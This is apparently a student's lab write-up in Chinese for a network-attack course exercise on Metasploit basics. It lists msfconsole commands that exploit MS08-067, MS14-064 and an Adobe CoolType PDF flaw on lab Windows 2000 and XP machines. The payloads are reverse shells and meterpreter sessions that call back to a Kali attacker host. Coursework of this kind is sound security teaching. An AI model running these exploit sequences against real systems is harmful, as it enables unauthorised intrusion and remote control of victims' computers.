参考:https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules/auxiliary
攻击机:kali (192.168.137.139)
靶机:Windows 2000 Professional (192.168.137.141)
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.137.141
set LHOST 192.168.137.139
set LPORT 8888
show options
show targets
set target 1
exploit
攻击机:kali (192.168.137.139)
靶机:Windows XP Professional (192.168.137.142)
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set AllowPowerShellPrompt 1
set SRVHOST 192.168.137.139
set LHOST 192.168.137.139
set LPORT 8888
set target 0
exploit
ctrl+c
退出当前状态,sessions -i 1
获取第一个会话连接
攻击机:kali (192.168.137.139)
靶机:Windows XP Professional (192.168.137.142)
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.139
set LPORT 8866
set FILENAME ln5207.pdf
exploit
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.139
set LPORT 8866
exploit
show auxiliary
info
2019-2020 网络对抗技术 20175207 Exp6 MSF基础应用
原文:https://www.cnblogs.com/ln-0407/p/12819791.html